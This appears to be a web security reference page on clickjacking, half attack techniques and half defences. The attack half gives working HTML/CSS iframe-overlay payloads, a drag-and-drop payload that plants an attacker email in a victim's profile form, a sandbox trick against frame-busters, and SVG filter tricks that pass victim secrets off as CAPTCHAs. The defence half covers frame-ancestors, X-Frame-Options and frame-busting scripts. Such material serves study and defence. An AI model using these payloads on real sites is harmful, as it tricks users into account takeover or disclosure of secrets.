Clickjacking


What is Clickjacking

In a clickjacking attack, a user is tricked into clicking an element on a web page that is either invisible or disguised as another element. This manipulation can lead to unintended consequences for the user, such as downloading malware, redirection to malicious web pages, disclosure of credentials or sensitive information, money transfers, or online purchases of products.

Prepopulate forms trick

Sometimes it is possible to fill in the values of form fields using GET parameters while loading a page. An attacker can abuse this behaviour to fill a form with arbitrary data and send the clickjacking payload so that the user presses the Submit button.

Populate form with Drag&Drop

If you need the user to fill a form but you don't want to ask them directly to write some specific information (like an email or a specific password that you know), you can just ask them to Drag&Drop something that will write your controlled data, as in this example.

Basic Payload

<style>
  iframe {
    position: relative;
    width: 500px;
    height: 700px;
    opacity: 0.1;
    z-index: 2;
  }
  div {
    position: absolute;
    top: 470px;
    left: 60px;
    z-index: 1;
  }
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

Multistep Payload

<style>
  iframe {
    position: relative;
    width: 500px;
    height: 500px;
    opacity: 0.1;
    z-index: 2;
  }
  .firstClick, .secondClick {
    position: absolute;
    top: 330px;
    left: 60px;
    z-index: 1;
  }
  .secondClick {
    left: 210px;
  }
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

Drag&Drop + Click payload

<html>
<head>
  <style>
    #payload {
      position: absolute;
      top: 20px;
    }
    iframe {
      width: 1000px;
      height: 675px;
      border: none;
    }
    .xss {
      position: fixed;
      background: #F00;
    }
  </style>
</head>
<body>
  <div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
  <div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
  <div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
  <iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3" src="https://target.com/panel/administration/profile/"></iframe>
  <div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

If you have identified an XSS attack that requires a user to click on some element to trigger the XSS, and the page is vulnerable to clickjacking, you can abuse it to trick the user into clicking the button/link.
Example:
You found a self XSS in some private details of the account (details that only you can set and read). The page with the form to set these details is vulnerable to Clickjacking, and you can prepopulate the form with GET parameters.
An attacker could prepare a Clickjacking attack on that page, prepopulating the form with the XSS payload and tricking the user into submitting the form. So, when the form is submitted and the values are modified, the user will execute the XSS.

DoubleClickjacking

First explained in this post, this technique asks the victim to double click a button of a custom page placed in a specific position, and uses the timing differences between the mousedown and onclick events to load the victim page during the double click, so the victim actually clicks a legitimate button in the victim page.

An example can be seen in this video: https://www.youtube.com/watch?v=4rGvRRMrD18

A code example can be found in this page.

Warning

This technique allows tricking the user into clicking one spot in the victim page, bypassing every protection against clickjacking. The attacker therefore needs to find sensitive actions that can be performed with just one click, like OAuth prompts accepting permissions.

SVG Filters / Cross-Origin Iframe UI Redressing

Modern Chromium/WebKit/Gecko builds allow CSS filter:url(#id) to be applied to cross-origin iframes. The iframe's rasterised pixels are fed into the SVG filter graph as SourceGraphic, so primitives like feDisplacementMap, feBlend, feComposite, feColorMatrix, feTile, feMorphology, etc. can arbitrarily rewrite the victim's UI before the user sees it, even though the attacker never touches the DOM. A simple Liquid-Glass style filter looks like:

<iframe src="https://victim.example" style="filter:url(#displacementFilter4)"></iframe>

  • Key primitives: feImage loads attacker bitmaps (e.g. overlays, displacement maps); feFlood builds constant-colour mattes; feOffset/feGaussianBlur refine highlights; feDisplacementMap refracts/warps text; feComposite operator="arithmetic" implements arbitrary per-channel math (r = k1*i1*i2 + k2*i1 + k3*i2 + k4), which is enough for contrast boosting, masking and AND/OR operations; feTile crops and replicates pixel probes; feMorphology grows/shrinks strokes; feColorMatrix moves luma into alpha to build precise masks.

Distorting secrets into CAPTCHA-style prompts

If a framable endpoint renders secrets (tokens, reset codes, API keys), the attacker can distort them so they look like a CAPTCHA and coerce manual transcription:

<svg width="0" height="0">
  <filter id="captchaFilter">
    <feTurbulence type="turbulence" baseFrequency="0.03" numOctaves="4" result="noise" />
    <feDisplacementMap in="SourceGraphic" in2="noise" scale="6" xChannelSelector="R" yChannelSelector="G" />
  </filter>
</svg>
<iframe src="https://victim" style="filter:url(#captchaFilter)"></iframe>
<input pattern="^6c79 ?7261 ?706f ?6e79$" required>

The distorted pixels fool the user into “solving” the captcha inside the attacker-controlled <input> whose pattern enforces the real victim secret.

Rewriting the victim's input context

Filters can precisely erase placeholder/validation text while preserving the user's keystrokes. One pipeline:

  1. feComposite operator="arithmetic" with k2≈4 multiplies brightness so grey helper text turns white.
  2. feTile constrains the working area to the input rectangle.
  3. feMorphology operator="erode" thickens the dark glyphs typed by the victim and exposes them via result="thick".
  4. feFlood creates a white plate; feBlend mode="difference" with thick and a second feComposite k2≈100 turn it into a hard luma matte.
  5. feColorMatrix moves that luma into alpha, and feComposite in="SourceGraphic" operator="in" keeps only the glyphs typed by the user.
  6. Another feBlend in2="white" plus a thin crop yields a clean text box, after which the attacker places their own HTML labels (e.g. "Enter your email") while the hidden iframe keeps enforcing the victim's native password policy.

Safari struggles with feTile; the same effect can be reproduced with spatial mattes built from feFlood + feColorMatrix + feComposite for WebKit-only payloads.

Pixel probes, logic and state machines

By cropping a 2–4 px region with feTile and tiling it to 100% of the viewport, the attacker turns a chosen colour into a full-frame texture that can be thresholded into a boolean mask:

<filter id="pixelProbe">
  <feTile x="313" y="141" width="4" height="4" />
  <feTile x="0" y="0" width="100%" height="100%" result="probe" />
  <feComposite in="probe" operator="arithmetic" k2="120" k4="-1" />
  <feColorMatrix type="matrix" values="0 0 0 0 0  0 0 0 0 0  0 0 0 0 0  0 0 1 0 0" result="mask" />
  <feGaussianBlur in="SourceGraphic" stdDeviation="2" />
  <feComposite operator="in" in2="mask" />
  <feBlend in2="SourceGraphic" />
</filter>

For arbitrary colors, a feFlood reference (e.g., #0B57D0) plus feBlend mode="difference" and another arithmetic composite (k2≈100, k4 as tolerance) outputs white only when the sampled pixel matches the target shade. Feeding these masks into feComposite with tuned k1..k4 yields logic gates: AND via k1=1, OR via k2=k3=1, XOR via feBlend mode="difference", NOT via blending against white. Chaining gates makes a full adder inside the filter graph, proving the pipeline is functionally complete.

Attackers can therefore read UI state without JavaScript. Example booleans from a modal workflow:

  • D (dialog visible): probe a corner that used to be dark and test it against white.
  • L (dialog loaded): probe the coordinates where the button appears once it is ready.
  • C (checkbox checked): compare the checkbox pixel against the active blue #0B57D0.
  • R (red success/failure banner): apply feMorphology and red thresholds inside the banner rectangle.

Each detected state drives a different overlay bitmap placed via feImage xlink:href="data:...". Masking those bitmaps with D, L, C, R keeps the overlays aligned with the real dialog and walks the victim through multi-step workflows (password recovery, consent/approvals, confirmation of destructive actions) without touching the DOM.

Browser extensions: DOM-based autofill clickjacking

Beyond iframing victim pages, attackers can target browser extension UI elements that are injected into the page. Password managers display autofill dropdowns next to focused inputs; by focusing an attacker-controlled field and hiding/covering the extension's dropdown (opacity/overlay/top-layer tricks), a user's misdirected click can select a saved entry and fill sensitive data into attacker-driven inputs. This variant needs no iframe exposure and works entirely through DOM/CSS manipulation.

Strategies to Mitigate Clickjacking

Client-side defences

Scripts executed on the client side can take actions to prevent Clickjacking:

  • Ensuring the application window is the main or top window.
  • Making all frames visible.
  • Preventing clicks on invisible frames.
  • Detecting and alerting users about Clickjacking attempts.

However, these frame-busting scripts can be circumvented:

  • Browsers' Security Settings: Some browsers may block these scripts depending on their security settings or lack of JavaScript support.
  • HTML5 iframe sandbox Attribute: An attacker can neutralise frame buster scripts by setting the sandbox attribute with the values allow-forms or allow-scripts but without allow-top-navigation. This prevents the iframe from verifying whether it is the top window, e.g.,

<iframe
  id="victim_website"
  src="https://victim-website.com"
  sandbox="allow-forms allow-scripts"></iframe>

The allow-forms and allow-scripts values enable actions inside the iframe while disabling top-level navigation. To ensure the targeted site functions as intended, additional permissions such as allow-same-origin and allow-modals may be needed, depending on the type of attack. Browser console messages can indicate which permissions to allow.

Server-side defences

X-Frame-Options

The X-Frame-Options HTTP response header informs browsers about the legitimacy of rendering a page inside a <frame> or <iframe>, helping to prevent Clickjacking:

  • X-Frame-Options: deny - No domain can frame the content.
  • X-Frame-Options: sameorigin - Only the current site can frame the content.
  • X-Frame-Options: allow-from https://trusted.com - Only the specified 'uri' can frame the page.
  • Note the limitations: if the browser does not support this directive, it may not work. Some browsers prefer the CSP frame-ancestors directive.

Content Security Policy (CSP) frame-ancestors directive

The frame-ancestors directive in CSP is the recommended method for Clickjacking protection:

  • frame-ancestors 'none' - Equivalent to X-Frame-Options: deny.
  • frame-ancestors 'self' - Equivalent to X-Frame-Options: sameorigin.
  • frame-ancestors trusted.com - Equivalent to X-Frame-Options: allow-from.

For example, the following CSP only allows framing from the same domain:

Content-Security-Policy: frame-ancestors 'self';

More details and complex examples can be found in the frame-ancestors CSP documentation and Mozilla's CSP frame-ancestors documentation.

Content Security Policy (CSP) with child-src and frame-src

Content Security Policy (CSP) is a security measure that helps prevent Clickjacking and other code injection attacks by specifying which sources the browser should allow to load content.

frame-src Directive

  • Specifies valid sources for frames.
  • More specific than the default-src directive.

Content-Security-Policy: frame-src 'self' https://trusted-website.com;

This policy allows frames from the same origin (self) and https://trusted-website.com.

child-src Directive

  • Introduced in CSP level 2 to specify the valid sources for web workers and frames.
  • Acts as a fallback for frame-src and worker-src.

Content-Security-Policy: child-src 'self' https://trusted-website.com;

This policy allows frames and workers from the same origin (self) and https://trusted-website.com.

Usage notes:

  • Deprecation: child-src is being phased out in favour of frame-src and worker-src.
  • Fallback behaviour: If frame-src is absent, child-src is used as the fallback for frames. If both are absent, default-src is used.
  • Strict source definition: Include only trusted sources in the directives to prevent exploitation.
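The X-Frame-Options, frame-ancestors and frame-src/child-src sections above describe several headers with overlapping and fallback semantics. The following JavaScript is an added example, not code from the original page or from HackTricks: a checker that takes a response header map and reports whether the page is protected against framing, which mechanism governs, and which directive ends up controlling what the page itself may embed. It applies the precedence rules stated above (frame-ancestors wins over X-Frame-Options in browsers that support it; frame-src falls back to child-src and then default-src) and treats X-Frame-Options ALLOW-FROM as no protection, since modern browsers ignore it. The header values in `samples` are constructed for the demonstration, not taken from any real site.

```javascript
// Added example: assess framing protection from a set of HTTP response headers.
// Header names are matched case-insensitively. Sample values are constructed.

function parseCsp(value) {
  // Returns a Map of directive name -> array of source expressions.
  // Per CSP, only the first occurrence of a directive is honoured.
  const directives = new Map();
  for (const part of value.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

function getHeader(headers, name) {
  const wanted = name.toLowerCase();
  for (const [key, value] of Object.entries(headers)) {
    if (key.toLowerCase() === wanted) return Array.isArray(value) ? value.join(', ') : value;
  }
  return null;
}

function assessFramingHeaders(headers) {
  const result = { protected: false, mechanism: null, allowedAncestors: null, effectiveFrameSrc: null, notes: [] };
  const cspValue = getHeader(headers, 'content-security-policy');
  const csp = cspValue ? parseCsp(cspValue) : new Map();

  // Who may embed this page: frame-ancestors governs when present, X-Frame-Options otherwise.
  if (csp.has('frame-ancestors')) {
    const sources = csp.get('frame-ancestors');
    result.mechanism = 'frame-ancestors';
    result.allowedAncestors = sources;
    // 'none', 'self' or an explicit allow-list restricts framing; a bare '*' does not.
    result.protected = !sources.includes('*');
    if (getHeader(headers, 'x-frame-options')) result.notes.push('X-Frame-Options ignored because frame-ancestors is present');
  } else {
    const xfo = getHeader(headers, 'x-frame-options');
    if (xfo) {
      const directive = xfo.trim().toUpperCase();
      result.mechanism = 'x-frame-options';
      if (directive === 'DENY') { result.protected = true; result.allowedAncestors = ["'none'"]; }
      else if (directive === 'SAMEORIGIN') { result.protected = true; result.allowedAncestors = ["'self'"]; }
      else if (directive.startsWith('ALLOW-FROM')) result.notes.push('ALLOW-FROM is obsolete and ignored by modern browsers; use frame-ancestors');
      else result.notes.push('unrecognised X-Frame-Options value: ' + xfo);
    } else {
      result.notes.push('no framing restriction: add Content-Security-Policy: frame-ancestors');
    }
  }

  // What this page may embed: frame-src -> child-src -> default-src fallback chain.
  for (const name of ['frame-src', 'child-src', 'default-src']) {
    if (csp.has(name)) { result.effectiveFrameSrc = { from: name, sources: csp.get(name) }; break; }
  }
  return result;
}

// Constructed sample responses (not real sites) used to exercise the checker.
const samples = {
  hardened: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self'; child-src https://trusted-website.com", 'X-Frame-Options': 'DENY' },
  legacyOnly: { 'x-frame-options': 'sameorigin' },
  obsolete: { 'X-Frame-Options': 'ALLOW-FROM https://trusted.com' },
  unprotected: { 'Content-Type': 'text/html' },
};

for (const [name, headers] of Object.entries(samples)) {
  console.log(name, JSON.stringify(assessFramingHeaders(headers)));
}
```

In practice the header map comes from a fetch of each sensitive endpoint (login, settings, OAuth consent pages); anything that reports `protected: false` or a note about ALLOW-FROM is a finding to fix by adding `frame-ancestors`.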

JavaScript frame-breaking scripts

Although not completely foolproof, JavaScript-based frame-busting scripts can be used to prevent a web page from being framed. Example:

if (top !== self) {
  top.location = self.location;
}
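The sandbox bypass described in the client-side section and the frame-buster just above share one weakness: when `top.location = self.location` is blocked by an iframe sandbox without allow-top-navigation, the page stays visible and clickable, so the defence fails open. The JavaScript below is an added example, not code from the original page, of the fail-closed variant used in the OWASP Clickjacking Defense Cheat Sheet: the page ships hidden by a `<style id="antiClickjack">body{display:none !important;}</style>` rule in `<head>`, and the script removes that rule only after confirming it runs in the top-level window; if busting fails, the page simply stays hidden. The `win`/`doc` parameters and the fake window and document builders are assumptions added so the decision logic can be exercised outside a browser; in a real page you pass `window` and `document`.

```javascript
// Added example: fail-closed frame buster (hide by default, reveal only at top level).
const HIDE_STYLE_ID = 'antiClickjack';

// Decide what to do given a window object: 'reveal' when top-level, 'bust' when framed.
function decideFrameAction(win) {
  return win.self === win.top ? 'reveal' : 'bust';
}

// Apply the decision and return the resulting state (visible / busted) for the caller.
function protectPage(win, doc) {
  const action = decideFrameAction(win);
  if (action === 'reveal') {
    // Remove the hiding <style> so the body becomes visible.
    const hide = doc.getElementById(HIDE_STYLE_ID);
    if (hide && hide.parentNode) hide.parentNode.removeChild(hide);
    return { action, visible: true, busted: false };
  }
  try {
    // Framed: try to break out of the frame.
    win.top.location = win.self.location;
    return { action, visible: false, busted: true };
  } catch (e) {
    // Sandbox (or other policy) blocked top navigation: stay hidden, i.e. fail closed.
    return { action, visible: false, busted: false, error: String(e) };
  }
}

// Constructed stand-ins for document/window so the logic can run offline (assumption).
function makeFakeDocument() {
  const style = { parentNode: null };
  const head = {
    children: [style],
    removeChild(node) { this.children = this.children.filter(c => c !== node); node.parentNode = null; },
  };
  style.parentNode = head;
  return { head, getElementById: id => (id === HIDE_STYLE_ID && head.children.includes(style) ? style : null) };
}

function makeTopLevelWindow() {
  const win = { location: 'https://app.example/' };
  win.self = win;
  win.top = win;
  return win;
}

// A framed window whose parent either permits top navigation or, when sandboxed, throws on it.
function makeFramedWindow({ sandboxed }) {
  const top = {
    get location() { return 'https://attacker.example/'; },
    set location(v) {
      if (sandboxed) throw new Error('SecurityError: top navigation blocked by sandbox');
      this.navigatedTo = v;
    },
  };
  const win = { location: 'https://app.example/', top };
  win.self = win;
  return win;
}

console.log('top-level  :', JSON.stringify(protectPage(makeTopLevelWindow(), makeFakeDocument())));
console.log('framed     :', JSON.stringify(protectPage(makeFramedWindow({ sandboxed: false }), makeFakeDocument())));
console.log('sandboxed  :', JSON.stringify(protectPage(makeFramedWindow({ sandboxed: true }), makeFakeDocument())));
```

The script must be inline in `<head>`, immediately after the hiding `<style>`, so it runs before any content is painted; and because a sandbox with allow-scripts but no allow-same-origin can still block JavaScript-based checks, this remains a defence in depth next to `frame-ancestors`, not a replacement for it.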

Using Anti-CSRF Tokens

  • Token validation: Use anti-CSRF tokens in web applications to ensure that state-changing requests are made intentionally by the user and not through a Clickjacked page.
